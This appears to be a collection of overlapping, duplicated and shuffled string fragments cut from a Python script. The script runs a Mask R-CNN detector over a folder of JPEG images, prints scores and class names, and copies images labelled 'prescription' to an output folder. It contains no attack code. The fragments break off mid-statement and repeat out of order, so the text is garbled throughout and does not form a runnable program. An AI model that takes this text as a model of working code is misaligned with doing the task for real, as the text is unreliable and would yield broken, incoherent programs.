"= model.detect([image], verbose=1) r = results[0] print(\"- \" * 40 ) print(\"Scores -->",
"skimage.io.imread(f) # Detect objects results = model.detect([image], verbose=1) r = results[0] print(\"- \"",
"# Useful if you're training a model on the same # machine, in",
"# # Object detector (by sequential file read from directory) # import os",
"Useful if you're training a model on the same # machine, in which",
"import miyukiCamera # Directory to save logs and trained model MODEL_DIR = os.path.join(ROOT_DIR,",
"in classes: print(\"found prescription on %s\" % f.split(\"/\")[-1]) image_file = f.split(\"/\")[-1] shutil.copy( f,",
",\\ \"Provide --image directory to apply detector\" model, config = process() dataset =",
"the neural network on. # Useful if you're training a model on the",
"local version of the library from mrcnn import utils from mrcnn import visualize",
"last model you trained weights_path = model.find_last() # Load weights print(\"Loading weights \",",
"model = modellib.MaskRCNN(mode=\"inference\", config=config, model_dir=MODEL_DIR) # Or, load the last model you trained",
"import cats_dogs from samples.miyukiCamera import miyukiCamera # Directory to save logs and trained",
"\"/gpu:0\" # /cpu:0 or /gpu:0 # Inspect the model in training or inference",
"return model, config def detector(model,config, dataset, DATA_DIR): MRCNN_DATA_DIR = \"/\".join( DATA_DIR.split('/')[:-1] ) MRCNN_DATA_DIR",
"as patches from glob import glob import argparse import skimage import shutil #",
"# /cpu:0 or /gpu:0 # Inspect the model in training or inference modes",
"\"*.jpg\") ) print(\"* total length of images : \", len(images) ) for f",
"= skimage.io.imread(f) # Detect objects results = model.detect([image], verbose=1) r = results[0] print(\"-",
"mrcnn.model import log #from samples.cats_dogs import cats_dogs from samples.miyukiCamera import miyukiCamera # Directory",
"from mrcnn import utils from mrcnn import visualize from mrcnn.visualize import display_images import",
"cats_dogs from samples.miyukiCamera import miyukiCamera # Directory to save logs and trained model",
"dataset to detect') args = parser.parse_args() assert args.dataset ,\\ \"Provide --image directory to",
"DATA_DIR.split('/')[:-1] ) MRCNN_DATA_DIR = os.path.join( MRCNN_DATA_DIR, \"mrcnn_image\") print(MRCNN_DATA_DIR) images = glob( os.path.join(DATA_DIR, \"*.jpg\")",
"(by sequential file read from directory) # import os import sys import random",
"directory) # import os import sys import random import math import re import",
"inference on # one image at a time. Batch size = GPU_COUNT *",
"= [dataset.class_info[i][\"name\"] for i in r['class_ids']] if \"prescription\" in classes: print(\"found prescription on",
"MODEL_DIR = os.path.join(ROOT_DIR, \"logs\") def process(): class InferenceConfig(miyukiCamera.MiyukiCameraConfig): # Set batch size to",
"results[0] print(\"- \" * 40 ) print(\"Scores --> \", r['scores']) print(\"found Class Names",
"of the target dataset to detect') args = parser.parse_args() assert args.dataset ,\\ \"Provide",
"yet TEST_MODE = \"inference\" # set model # Create model in inference mode",
"Batch size = GPU_COUNT * IMAGES_PER_GPU GPU_COUNT = 1 IMAGES_PER_GPU = 1 config",
"model.detect([image], verbose=1) r = results[0] print(\"- \" * 40 ) print(\"Scores --> \",",
"in inference mode with tf.device(DEVICE): model = modellib.MaskRCNN(mode=\"inference\", config=config, model_dir=MODEL_DIR) # Or, load",
"samples.miyukiCamera import miyukiCamera # Directory to save logs and trained model MODEL_DIR =",
"'inference' or 'training' # TODO: code for 'training' test mode not ready yet",
"the same # machine, in which case use CPU and leave the #",
"load the neural network on. # Useful if you're training a model on",
"Detect objects results = model.detect([image], verbose=1) r = results[0] print(\"- \" * 40",
"config = process() dataset = miyukiCamera.MiyukiCameraDataset() DATA_DIR = args.dataset detector(model, config, dataset, DATA_DIR)",
"import glob import argparse import skimage import shutil # Root directory of the",
"the # GPU for training. DEVICE = \"/gpu:0\" # /cpu:0 or /gpu:0 #",
"ready yet TEST_MODE = \"inference\" # set model # Create model in inference",
"config def detector(model,config, dataset, DATA_DIR): MRCNN_DATA_DIR = \"/\".join( DATA_DIR.split('/')[:-1] ) MRCNN_DATA_DIR = os.path.join(",
"config=config, model_dir=MODEL_DIR) # Or, load the last model you trained weights_path = model.find_last()",
"Read image image = skimage.io.imread(f) # Detect objects results = model.detect([image], verbose=1) r",
"Device to load the neural network on. # Useful if you're training a",
"on. # Useful if you're training a model on the same # machine,",
"# Object detector (by sequential file read from directory) # import os import",
"import shutil # Root directory of the project ROOT_DIR = os.path.abspath(\"../../\") # Import",
"samples.cats_dogs import cats_dogs from samples.miyukiCamera import miyukiCamera # Directory to save logs and",
"detector(model,config, dataset, DATA_DIR): MRCNN_DATA_DIR = \"/\".join( DATA_DIR.split('/')[:-1] ) MRCNN_DATA_DIR = os.path.join( MRCNN_DATA_DIR, \"mrcnn_image\")",
"= InferenceConfig() #config.display() # Device to load the neural network on. # Useful",
"weights_path = model.find_last() # Load weights print(\"Loading weights \", weights_path) model.load_weights(weights_path, by_name=True) return",
"glob import glob import argparse import skimage import shutil # Root directory of",
"Detector.') parser.add_argument('--dataset', required=True, metavar=\"/path/to/balloon/dataset\", help='Directory of the target dataset to detect') args =",
"# import os import sys import random import math import re import time",
"CPU and leave the # GPU for training. DEVICE = \"/gpu:0\" # /cpu:0",
"# Parse command line arguments parser = argparse.ArgumentParser( description='Sequential Reading File Object Detector.')",
"the library from mrcnn import utils from mrcnn import visualize from mrcnn.visualize import",
"and trained model MODEL_DIR = os.path.join(ROOT_DIR, \"logs\") def process(): class InferenceConfig(miyukiCamera.MiyukiCameraConfig): # Set",
"glob import argparse import skimage import shutil # Root directory of the project",
") print(\"Scores --> \", r['scores']) print(\"found Class Names --> \", [dataset.class_info[i][\"name\"] for i",
"required=True, metavar=\"/path/to/balloon/dataset\", help='Directory of the target dataset to detect') args = parser.parse_args() assert",
"as modellib from mrcnn.model import log #from samples.cats_dogs import cats_dogs from samples.miyukiCamera import",
"batch size to 1 since we'll be running inference on # one image",
"1 IMAGES_PER_GPU = 1 config = InferenceConfig() #config.display() # Device to load the",
"\", weights_path) model.load_weights(weights_path, by_name=True) return model, config def detector(model,config, dataset, DATA_DIR): MRCNN_DATA_DIR =",
"import log #from samples.cats_dogs import cats_dogs from samples.miyukiCamera import miyukiCamera # Directory to",
"args.dataset ,\\ \"Provide --image directory to apply detector\" model, config = process() dataset",
"#config.display() # Device to load the neural network on. # Useful if you're",
"import display_images import mrcnn.model as modellib from mrcnn.model import log #from samples.cats_dogs import",
"def process(): class InferenceConfig(miyukiCamera.MiyukiCameraConfig): # Set batch size to 1 since we'll be",
"* 40 ) print(\"Scores --> \", r['scores']) print(\"found Class Names --> \", [dataset.class_info[i][\"name\"]",
"on %s\" % f.split(\"/\")[-1]) image_file = f.split(\"/\")[-1] shutil.copy( f, os.path.join( MRCNN_DATA_DIR, image_file )",
"at a time. Batch size = GPU_COUNT * IMAGES_PER_GPU GPU_COUNT = 1 IMAGES_PER_GPU",
"r['class_ids']] ) classes = [dataset.class_info[i][\"name\"] for i in r['class_ids']] if \"prescription\" in classes:",
"modellib.MaskRCNN(mode=\"inference\", config=config, model_dir=MODEL_DIR) # Or, load the last model you trained weights_path =",
"trained weights_path = model.find_last() # Load weights print(\"Loading weights \", weights_path) model.load_weights(weights_path, by_name=True)",
"# Read image image = skimage.io.imread(f) # Detect objects results = model.detect([image], verbose=1)",
"case use CPU and leave the # GPU for training. DEVICE = \"/gpu:0\"",
"model in training or inference modes # values: 'inference' or 'training' # TODO:",
"if you're training a model on the same # machine, in which case",
"size to 1 since we'll be running inference on # one image at",
"f in images: print(\"Running on {}\".format(f)) # Read image image = skimage.io.imread(f) #",
"40 ) print(\"Scores --> \", r['scores']) print(\"found Class Names --> \", [dataset.class_info[i][\"name\"] for",
"training a model on the same # machine, in which case use CPU",
"from glob import glob import argparse import skimage import shutil # Root directory",
"model in inference mode with tf.device(DEVICE): model = modellib.MaskRCNN(mode=\"inference\", config=config, model_dir=MODEL_DIR) # Or,",
"load the last model you trained weights_path = model.find_last() # Load weights print(\"Loading",
"--> \", r['scores']) print(\"found Class Names --> \", [dataset.class_info[i][\"name\"] for i in r['class_ids']]",
"mrcnn import utils from mrcnn import visualize from mrcnn.visualize import display_images import mrcnn.model",
"the model in training or inference modes # values: 'inference' or 'training' #",
"\"/\".join( DATA_DIR.split('/')[:-1] ) MRCNN_DATA_DIR = os.path.join( MRCNN_DATA_DIR, \"mrcnn_image\") print(MRCNN_DATA_DIR) images = glob( os.path.join(DATA_DIR,",
"Directory to save logs and trained model MODEL_DIR = os.path.join(ROOT_DIR, \"logs\") def process():",
"length of images : \", len(images) ) for f in images: print(\"Running on",
"model you trained weights_path = model.find_last() # Load weights print(\"Loading weights \", weights_path)",
"Names --> \", [dataset.class_info[i][\"name\"] for i in r['class_ids']] ) classes = [dataset.class_info[i][\"name\"] for",
"= os.path.join( MRCNN_DATA_DIR, \"mrcnn_image\") print(MRCNN_DATA_DIR) images = glob( os.path.join(DATA_DIR, \"*.jpg\") ) print(\"* total",
"with tf.device(DEVICE): model = modellib.MaskRCNN(mode=\"inference\", config=config, model_dir=MODEL_DIR) # Or, load the last model",
"= modellib.MaskRCNN(mode=\"inference\", config=config, model_dir=MODEL_DIR) # Or, load the last model you trained weights_path",
"for i in r['class_ids']] ) classes = [dataset.class_info[i][\"name\"] for i in r['class_ids']] if",
"process() dataset = miyukiCamera.MiyukiCameraDataset() DATA_DIR = args.dataset detector(model, config, dataset, DATA_DIR) if __name__",
": \", len(images) ) for f in images: print(\"Running on {}\".format(f)) # Read",
"# set model # Create model in inference mode with tf.device(DEVICE): model =",
"= os.path.join(ROOT_DIR, \"logs\") def process(): class InferenceConfig(miyukiCamera.MiyukiCameraConfig): # Set batch size to 1",
"model.load_weights(weights_path, by_name=True) return model, config def detector(model,config, dataset, DATA_DIR): MRCNN_DATA_DIR = \"/\".join( DATA_DIR.split('/')[:-1]",
"in which case use CPU and leave the # GPU for training. DEVICE",
"# To find local version of the library from mrcnn import utils from",
"verbose=1) r = results[0] print(\"- \" * 40 ) print(\"Scores --> \", r['scores'])",
"sys import random import math import re import time import numpy as np",
"# Create model in inference mode with tf.device(DEVICE): model = modellib.MaskRCNN(mode=\"inference\", config=config, model_dir=MODEL_DIR)",
"\", len(images) ) for f in images: print(\"Running on {}\".format(f)) # Read image",
"of the library from mrcnn import utils from mrcnn import visualize from mrcnn.visualize",
"# Directory to save logs and trained model MODEL_DIR = os.path.join(ROOT_DIR, \"logs\") def",
"and leave the # GPU for training. DEVICE = \"/gpu:0\" # /cpu:0 or",
"mode with tf.device(DEVICE): model = modellib.MaskRCNN(mode=\"inference\", config=config, model_dir=MODEL_DIR) # Or, load the last",
"import sys import random import math import re import time import numpy as",
"tf import matplotlib import matplotlib.pyplot as plt import matplotlib.patches as patches from glob",
"Or, load the last model you trained weights_path = model.find_last() # Load weights",
"os.path.join(DATA_DIR, \"*.jpg\") ) print(\"* total length of images : \", len(images) ) for",
"/cpu:0 or /gpu:0 # Inspect the model in training or inference modes #",
"Load weights print(\"Loading weights \", weights_path) model.load_weights(weights_path, by_name=True) return model, config def detector(model,config,",
"GPU for training. DEVICE = \"/gpu:0\" # /cpu:0 or /gpu:0 # Inspect the",
"model # Create model in inference mode with tf.device(DEVICE): model = modellib.MaskRCNN(mode=\"inference\", config=config,",
"apply detector\" model, config = process() dataset = miyukiCamera.MiyukiCameraDataset() DATA_DIR = args.dataset detector(model,",
"mrcnn.visualize import display_images import mrcnn.model as modellib from mrcnn.model import log #from samples.cats_dogs",
"import re import time import numpy as np import tensorflow as tf import",
"on the same # machine, in which case use CPU and leave the",
"for i in r['class_ids']] if \"prescription\" in classes: print(\"found prescription on %s\" %",
"= miyukiCamera.MiyukiCameraDataset() DATA_DIR = args.dataset detector(model, config, dataset, DATA_DIR) if __name__ == \"__main__\":",
"we'll be running inference on # one image at a time. Batch size",
"MRCNN_DATA_DIR = os.path.join( MRCNN_DATA_DIR, \"mrcnn_image\") print(MRCNN_DATA_DIR) images = glob( os.path.join(DATA_DIR, \"*.jpg\") ) print(\"*",
"tensorflow as tf import matplotlib import matplotlib.pyplot as plt import matplotlib.patches as patches",
"detector (by sequential file read from directory) # import os import sys import",
"running inference on # one image at a time. Batch size = GPU_COUNT",
"config = InferenceConfig() #config.display() # Device to load the neural network on. #",
"GPU_COUNT * IMAGES_PER_GPU GPU_COUNT = 1 IMAGES_PER_GPU = 1 config = InferenceConfig() #config.display()",
"Mask RCNN sys.path.append(ROOT_DIR) # To find local version of the library from mrcnn",
"from mrcnn.model import log #from samples.cats_dogs import cats_dogs from samples.miyukiCamera import miyukiCamera #",
"= process() dataset = miyukiCamera.MiyukiCameraDataset() DATA_DIR = args.dataset detector(model, config, dataset, DATA_DIR) if",
"dataset = miyukiCamera.MiyukiCameraDataset() DATA_DIR = args.dataset detector(model, config, dataset, DATA_DIR) if __name__ ==",
"args = parser.parse_args() assert args.dataset ,\\ \"Provide --image directory to apply detector\" model,",
"or /gpu:0 # Inspect the model in training or inference modes # values:",
"model.find_last() # Load weights print(\"Loading weights \", weights_path) model.load_weights(weights_path, by_name=True) return model, config",
"matplotlib import matplotlib.pyplot as plt import matplotlib.patches as patches from glob import glob",
"os.path.join(ROOT_DIR, \"logs\") def process(): class InferenceConfig(miyukiCamera.MiyukiCameraConfig): # Set batch size to 1 since",
"parser = argparse.ArgumentParser( description='Sequential Reading File Object Detector.') parser.add_argument('--dataset', required=True, metavar=\"/path/to/balloon/dataset\", help='Directory of",
"% f.split(\"/\")[-1]) image_file = f.split(\"/\")[-1] shutil.copy( f, os.path.join( MRCNN_DATA_DIR, image_file ) ) def",
"the project ROOT_DIR = os.path.abspath(\"../../\") # Import Mask RCNN sys.path.append(ROOT_DIR) # To find",
"save logs and trained model MODEL_DIR = os.path.join(ROOT_DIR, \"logs\") def process(): class InferenceConfig(miyukiCamera.MiyukiCameraConfig):",
"Object Detector.') parser.add_argument('--dataset', required=True, metavar=\"/path/to/balloon/dataset\", help='Directory of the target dataset to detect') args",
"= \"/gpu:0\" # /cpu:0 or /gpu:0 # Inspect the model in training or",
"Reading File Object Detector.') parser.add_argument('--dataset', required=True, metavar=\"/path/to/balloon/dataset\", help='Directory of the target dataset to",
") for f in images: print(\"Running on {}\".format(f)) # Read image image =",
"f, os.path.join( MRCNN_DATA_DIR, image_file ) ) def main(): # Parse command line arguments",
"TEST_MODE = \"inference\" # set model # Create model in inference mode with",
"matplotlib.patches as patches from glob import glob import argparse import skimage import shutil",
"log #from samples.cats_dogs import cats_dogs from samples.miyukiCamera import miyukiCamera # Directory to save",
") print(\"* total length of images : \", len(images) ) for f in",
"in r['class_ids']] if \"prescription\" in classes: print(\"found prescription on %s\" % f.split(\"/\")[-1]) image_file",
"{}\".format(f)) # Read image image = skimage.io.imread(f) # Detect objects results = model.detect([image],",
"which case use CPU and leave the # GPU for training. DEVICE =",
"# Root directory of the project ROOT_DIR = os.path.abspath(\"../../\") # Import Mask RCNN",
"\", r['scores']) print(\"found Class Names --> \", [dataset.class_info[i][\"name\"] for i in r['class_ids']] )",
"def detector(model,config, dataset, DATA_DIR): MRCNN_DATA_DIR = \"/\".join( DATA_DIR.split('/')[:-1] ) MRCNN_DATA_DIR = os.path.join( MRCNN_DATA_DIR,",
"model MODEL_DIR = os.path.join(ROOT_DIR, \"logs\") def process(): class InferenceConfig(miyukiCamera.MiyukiCameraConfig): # Set batch size",
"re import time import numpy as np import tensorflow as tf import matplotlib",
"[dataset.class_info[i][\"name\"] for i in r['class_ids']] ) classes = [dataset.class_info[i][\"name\"] for i in r['class_ids']]",
"# values: 'inference' or 'training' # TODO: code for 'training' test mode not",
"import tensorflow as tf import matplotlib import matplotlib.pyplot as plt import matplotlib.patches as",
"os.path.abspath(\"../../\") # Import Mask RCNN sys.path.append(ROOT_DIR) # To find local version of the",
"by_name=True) return model, config def detector(model,config, dataset, DATA_DIR): MRCNN_DATA_DIR = \"/\".join( DATA_DIR.split('/')[:-1] )",
"images : \", len(images) ) for f in images: print(\"Running on {}\".format(f)) #",
"%s\" % f.split(\"/\")[-1]) image_file = f.split(\"/\")[-1] shutil.copy( f, os.path.join( MRCNN_DATA_DIR, image_file ) )",
"visualize from mrcnn.visualize import display_images import mrcnn.model as modellib from mrcnn.model import log",
"os import sys import random import math import re import time import numpy",
"training. DEVICE = \"/gpu:0\" # /cpu:0 or /gpu:0 # Inspect the model in",
"import argparse import skimage import shutil # Root directory of the project ROOT_DIR",
"MRCNN_DATA_DIR, \"mrcnn_image\") print(MRCNN_DATA_DIR) images = glob( os.path.join(DATA_DIR, \"*.jpg\") ) print(\"* total length of",
"import skimage import shutil # Root directory of the project ROOT_DIR = os.path.abspath(\"../../\")",
"image_file = f.split(\"/\")[-1] shutil.copy( f, os.path.join( MRCNN_DATA_DIR, image_file ) ) def main(): #",
"image at a time. Batch size = GPU_COUNT * IMAGES_PER_GPU GPU_COUNT = 1",
"directory to apply detector\" model, config = process() dataset = miyukiCamera.MiyukiCameraDataset() DATA_DIR =",
"# Load weights print(\"Loading weights \", weights_path) model.load_weights(weights_path, by_name=True) return model, config def",
"plt import matplotlib.patches as patches from glob import glob import argparse import skimage",
"find local version of the library from mrcnn import utils from mrcnn import",
"or 'training' # TODO: code for 'training' test mode not ready yet TEST_MODE",
"# Inspect the model in training or inference modes # values: 'inference' or",
"neural network on. # Useful if you're training a model on the same",
"as np import tensorflow as tf import matplotlib import matplotlib.pyplot as plt import",
"Set batch size to 1 since we'll be running inference on # one",
"project ROOT_DIR = os.path.abspath(\"../../\") # Import Mask RCNN sys.path.append(ROOT_DIR) # To find local",
"= GPU_COUNT * IMAGES_PER_GPU GPU_COUNT = 1 IMAGES_PER_GPU = 1 config = InferenceConfig()",
"images = glob( os.path.join(DATA_DIR, \"*.jpg\") ) print(\"* total length of images : \",",
"\", [dataset.class_info[i][\"name\"] for i in r['class_ids']] ) classes = [dataset.class_info[i][\"name\"] for i in",
"# machine, in which case use CPU and leave the # GPU for",
"# Detect objects results = model.detect([image], verbose=1) r = results[0] print(\"- \" *",
"Class Names --> \", [dataset.class_info[i][\"name\"] for i in r['class_ids']] ) classes = [dataset.class_info[i][\"name\"]",
"one image at a time. Batch size = GPU_COUNT * IMAGES_PER_GPU GPU_COUNT =",
"as tf import matplotlib import matplotlib.pyplot as plt import matplotlib.patches as patches from",
"f.split(\"/\")[-1] shutil.copy( f, os.path.join( MRCNN_DATA_DIR, image_file ) ) def main(): # Parse command",
"Parse command line arguments parser = argparse.ArgumentParser( description='Sequential Reading File Object Detector.') parser.add_argument('--dataset',",
"shutil.copy( f, os.path.join( MRCNN_DATA_DIR, image_file ) ) def main(): # Parse command line",
"use CPU and leave the # GPU for training. DEVICE = \"/gpu:0\" #",
"image = skimage.io.imread(f) # Detect objects results = model.detect([image], verbose=1) r = results[0]",
"To find local version of the library from mrcnn import utils from mrcnn",
"image image = skimage.io.imread(f) # Detect objects results = model.detect([image], verbose=1) r =",
"from mrcnn.visualize import display_images import mrcnn.model as modellib from mrcnn.model import log #from",
") def main(): # Parse command line arguments parser = argparse.ArgumentParser( description='Sequential Reading",
"f.split(\"/\")[-1]) image_file = f.split(\"/\")[-1] shutil.copy( f, os.path.join( MRCNN_DATA_DIR, image_file ) ) def main():",
"set model # Create model in inference mode with tf.device(DEVICE): model = modellib.MaskRCNN(mode=\"inference\",",
"for f in images: print(\"Running on {}\".format(f)) # Read image image = skimage.io.imread(f)",
"inference modes # values: 'inference' or 'training' # TODO: code for 'training' test",
"print(\"Running on {}\".format(f)) # Read image image = skimage.io.imread(f) # Detect objects results",
"description='Sequential Reading File Object Detector.') parser.add_argument('--dataset', required=True, metavar=\"/path/to/balloon/dataset\", help='Directory of the target dataset",
"'training' test mode not ready yet TEST_MODE = \"inference\" # set model #",
"file read from directory) # import os import sys import random import math",
"as plt import matplotlib.patches as patches from glob import glob import argparse import",
"RCNN sys.path.append(ROOT_DIR) # To find local version of the library from mrcnn import",
"IMAGES_PER_GPU = 1 config = InferenceConfig() #config.display() # Device to load the neural",
"sequential file read from directory) # import os import sys import random import",
"os.path.join( MRCNN_DATA_DIR, image_file ) ) def main(): # Parse command line arguments parser",
"InferenceConfig() #config.display() # Device to load the neural network on. # Useful if",
"same # machine, in which case use CPU and leave the # GPU",
"= f.split(\"/\")[-1] shutil.copy( f, os.path.join( MRCNN_DATA_DIR, image_file ) ) def main(): # Parse",
"prescription on %s\" % f.split(\"/\")[-1]) image_file = f.split(\"/\")[-1] shutil.copy( f, os.path.join( MRCNN_DATA_DIR, image_file",
"library from mrcnn import utils from mrcnn import visualize from mrcnn.visualize import display_images",
"miyukiCamera.MiyukiCameraDataset() DATA_DIR = args.dataset detector(model, config, dataset, DATA_DIR) if __name__ == \"__main__\": main()",
"InferenceConfig(miyukiCamera.MiyukiCameraConfig): # Set batch size to 1 since we'll be running inference on",
"machine, in which case use CPU and leave the # GPU for training.",
"assert args.dataset ,\\ \"Provide --image directory to apply detector\" model, config = process()",
"= glob( os.path.join(DATA_DIR, \"*.jpg\") ) print(\"* total length of images : \", len(images)",
"to apply detector\" model, config = process() dataset = miyukiCamera.MiyukiCameraDataset() DATA_DIR = args.dataset",
"import matplotlib.pyplot as plt import matplotlib.patches as patches from glob import glob import",
"print(MRCNN_DATA_DIR) images = glob( os.path.join(DATA_DIR, \"*.jpg\") ) print(\"* total length of images :",
"= \"inference\" # set model # Create model in inference mode with tf.device(DEVICE):",
"weights print(\"Loading weights \", weights_path) model.load_weights(weights_path, by_name=True) return model, config def detector(model,config, dataset,",
"mode not ready yet TEST_MODE = \"inference\" # set model # Create model",
"in images: print(\"Running on {}\".format(f)) # Read image image = skimage.io.imread(f) # Detect",
"leave the # GPU for training. DEVICE = \"/gpu:0\" # /cpu:0 or /gpu:0",
"training or inference modes # values: 'inference' or 'training' # TODO: code for",
"from directory) # import os import sys import random import math import re",
"on {}\".format(f)) # Read image image = skimage.io.imread(f) # Detect objects results =",
"Import Mask RCNN sys.path.append(ROOT_DIR) # To find local version of the library from",
"image_file ) ) def main(): # Parse command line arguments parser = argparse.ArgumentParser(",
"\"prescription\" in classes: print(\"found prescription on %s\" % f.split(\"/\")[-1]) image_file = f.split(\"/\")[-1] shutil.copy(",
"import visualize from mrcnn.visualize import display_images import mrcnn.model as modellib from mrcnn.model import",
"version of the library from mrcnn import utils from mrcnn import visualize from",
"objects results = model.detect([image], verbose=1) r = results[0] print(\"- \" * 40 )",
"sys.path.append(ROOT_DIR) # To find local version of the library from mrcnn import utils",
"# Device to load the neural network on. # Useful if you're training",
"you trained weights_path = model.find_last() # Load weights print(\"Loading weights \", weights_path) model.load_weights(weights_path,",
"weights \", weights_path) model.load_weights(weights_path, by_name=True) return model, config def detector(model,config, dataset, DATA_DIR): MRCNN_DATA_DIR",
"i in r['class_ids']] ) classes = [dataset.class_info[i][\"name\"] for i in r['class_ids']] if \"prescription\"",
"print(\"* total length of images : \", len(images) ) for f in images:",
"print(\"- \" * 40 ) print(\"Scores --> \", r['scores']) print(\"found Class Names -->",
"time. Batch size = GPU_COUNT * IMAGES_PER_GPU GPU_COUNT = 1 IMAGES_PER_GPU = 1",
"= parser.parse_args() assert args.dataset ,\\ \"Provide --image directory to apply detector\" model, config",
"model on the same # machine, in which case use CPU and leave",
"since we'll be running inference on # one image at a time. Batch",
"patches from glob import glob import argparse import skimage import shutil # Root",
"1 since we'll be running inference on # one image at a time.",
"def main(): # Parse command line arguments parser = argparse.ArgumentParser( description='Sequential Reading File",
"os.path.join( MRCNN_DATA_DIR, \"mrcnn_image\") print(MRCNN_DATA_DIR) images = glob( os.path.join(DATA_DIR, \"*.jpg\") ) print(\"* total length",
"in r['class_ids']] ) classes = [dataset.class_info[i][\"name\"] for i in r['class_ids']] if \"prescription\" in",
"read from directory) # import os import sys import random import math import",
"1 config = InferenceConfig() #config.display() # Device to load the neural network on.",
"Inspect the model in training or inference modes # values: 'inference' or 'training'",
"size = GPU_COUNT * IMAGES_PER_GPU GPU_COUNT = 1 IMAGES_PER_GPU = 1 config =",
"len(images) ) for f in images: print(\"Running on {}\".format(f)) # Read image image",
"to save logs and trained model MODEL_DIR = os.path.join(ROOT_DIR, \"logs\") def process(): class",
"ROOT_DIR = os.path.abspath(\"../../\") # Import Mask RCNN sys.path.append(ROOT_DIR) # To find local version",
"a time. Batch size = GPU_COUNT * IMAGES_PER_GPU GPU_COUNT = 1 IMAGES_PER_GPU =",
"--image directory to apply detector\" model, config = process() dataset = miyukiCamera.MiyukiCameraDataset() DATA_DIR",
"values: 'inference' or 'training' # TODO: code for 'training' test mode not ready",
"random import math import re import time import numpy as np import tensorflow",
"shutil # Root directory of the project ROOT_DIR = os.path.abspath(\"../../\") # Import Mask",
"miyukiCamera # Directory to save logs and trained model MODEL_DIR = os.path.join(ROOT_DIR, \"logs\")",
"parser.add_argument('--dataset', required=True, metavar=\"/path/to/balloon/dataset\", help='Directory of the target dataset to detect') args = parser.parse_args()",
"logs and trained model MODEL_DIR = os.path.join(ROOT_DIR, \"logs\") def process(): class InferenceConfig(miyukiCamera.MiyukiCameraConfig): #",
"# Set batch size to 1 since we'll be running inference on #",
"arguments parser = argparse.ArgumentParser( description='Sequential Reading File Object Detector.') parser.add_argument('--dataset', required=True, metavar=\"/path/to/balloon/dataset\", help='Directory",
"TODO: code for 'training' test mode not ready yet TEST_MODE = \"inference\" #",
"not ready yet TEST_MODE = \"inference\" # set model # Create model in",
"DATA_DIR): MRCNN_DATA_DIR = \"/\".join( DATA_DIR.split('/')[:-1] ) MRCNN_DATA_DIR = os.path.join( MRCNN_DATA_DIR, \"mrcnn_image\") print(MRCNN_DATA_DIR) images",
"# Or, load the last model you trained weights_path = model.find_last() # Load",
"import utils from mrcnn import visualize from mrcnn.visualize import display_images import mrcnn.model as",
"Create model in inference mode with tf.device(DEVICE): model = modellib.MaskRCNN(mode=\"inference\", config=config, model_dir=MODEL_DIR) #",
"= results[0] print(\"- \" * 40 ) print(\"Scores --> \", r['scores']) print(\"found Class",
"print(\"found prescription on %s\" % f.split(\"/\")[-1]) image_file = f.split(\"/\")[-1] shutil.copy( f, os.path.join( MRCNN_DATA_DIR,",
"dataset, DATA_DIR): MRCNN_DATA_DIR = \"/\".join( DATA_DIR.split('/')[:-1] ) MRCNN_DATA_DIR = os.path.join( MRCNN_DATA_DIR, \"mrcnn_image\") print(MRCNN_DATA_DIR)",
") MRCNN_DATA_DIR = os.path.join( MRCNN_DATA_DIR, \"mrcnn_image\") print(MRCNN_DATA_DIR) images = glob( os.path.join(DATA_DIR, \"*.jpg\") )",
"--> \", [dataset.class_info[i][\"name\"] for i in r['class_ids']] ) classes = [dataset.class_info[i][\"name\"] for i",
"model, config def detector(model,config, dataset, DATA_DIR): MRCNN_DATA_DIR = \"/\".join( DATA_DIR.split('/')[:-1] ) MRCNN_DATA_DIR =",
"\"logs\") def process(): class InferenceConfig(miyukiCamera.MiyukiCameraConfig): # Set batch size to 1 since we'll",
"# GPU for training. DEVICE = \"/gpu:0\" # /cpu:0 or /gpu:0 # Inspect",
"import random import math import re import time import numpy as np import",
"test mode not ready yet TEST_MODE = \"inference\" # set model # Create",
"= model.find_last() # Load weights print(\"Loading weights \", weights_path) model.load_weights(weights_path, by_name=True) return model,",
"# TODO: code for 'training' test mode not ready yet TEST_MODE = \"inference\"",
"be running inference on # one image at a time. Batch size =",
"the target dataset to detect') args = parser.parse_args() assert args.dataset ,\\ \"Provide --image",
"code for 'training' test mode not ready yet TEST_MODE = \"inference\" # set",
"= argparse.ArgumentParser( description='Sequential Reading File Object Detector.') parser.add_argument('--dataset', required=True, metavar=\"/path/to/balloon/dataset\", help='Directory of the",
"model_dir=MODEL_DIR) # Or, load the last model you trained weights_path = model.find_last() #",
"detect') args = parser.parse_args() assert args.dataset ,\\ \"Provide --image directory to apply detector\"",
"classes: print(\"found prescription on %s\" % f.split(\"/\")[-1]) image_file = f.split(\"/\")[-1] shutil.copy( f, os.path.join(",
"DEVICE = \"/gpu:0\" # /cpu:0 or /gpu:0 # Inspect the model in training",
"for training. DEVICE = \"/gpu:0\" # /cpu:0 or /gpu:0 # Inspect the model",
"parser.parse_args() assert args.dataset ,\\ \"Provide --image directory to apply detector\" model, config =",
"argparse.ArgumentParser( description='Sequential Reading File Object Detector.') parser.add_argument('--dataset', required=True, metavar=\"/path/to/balloon/dataset\", help='Directory of the target",
"import os import sys import random import math import re import time import",
"# one image at a time. Batch size = GPU_COUNT * IMAGES_PER_GPU GPU_COUNT",
"= \"/\".join( DATA_DIR.split('/')[:-1] ) MRCNN_DATA_DIR = os.path.join( MRCNN_DATA_DIR, \"mrcnn_image\") print(MRCNN_DATA_DIR) images = glob(",
"import numpy as np import tensorflow as tf import matplotlib import matplotlib.pyplot as",
"utils from mrcnn import visualize from mrcnn.visualize import display_images import mrcnn.model as modellib",
"i in r['class_ids']] if \"prescription\" in classes: print(\"found prescription on %s\" % f.split(\"/\")[-1])",
"\"Provide --image directory to apply detector\" model, config = process() dataset = miyukiCamera.MiyukiCameraDataset()",
"\" * 40 ) print(\"Scores --> \", r['scores']) print(\"found Class Names --> \",",
"if \"prescription\" in classes: print(\"found prescription on %s\" % f.split(\"/\")[-1]) image_file = f.split(\"/\")[-1]",
"/gpu:0 # Inspect the model in training or inference modes # values: 'inference'",
"detector\" model, config = process() dataset = miyukiCamera.MiyukiCameraDataset() DATA_DIR = args.dataset detector(model, config,",
"time import numpy as np import tensorflow as tf import matplotlib import matplotlib.pyplot",
"\"inference\" # set model # Create model in inference mode with tf.device(DEVICE): model",
"mrcnn import visualize from mrcnn.visualize import display_images import mrcnn.model as modellib from mrcnn.model",
"class InferenceConfig(miyukiCamera.MiyukiCameraConfig): # Set batch size to 1 since we'll be running inference",
"import matplotlib import matplotlib.pyplot as plt import matplotlib.patches as patches from glob import",
"weights_path) model.load_weights(weights_path, by_name=True) return model, config def detector(model,config, dataset, DATA_DIR): MRCNN_DATA_DIR = \"/\".join(",
"from samples.miyukiCamera import miyukiCamera # Directory to save logs and trained model MODEL_DIR",
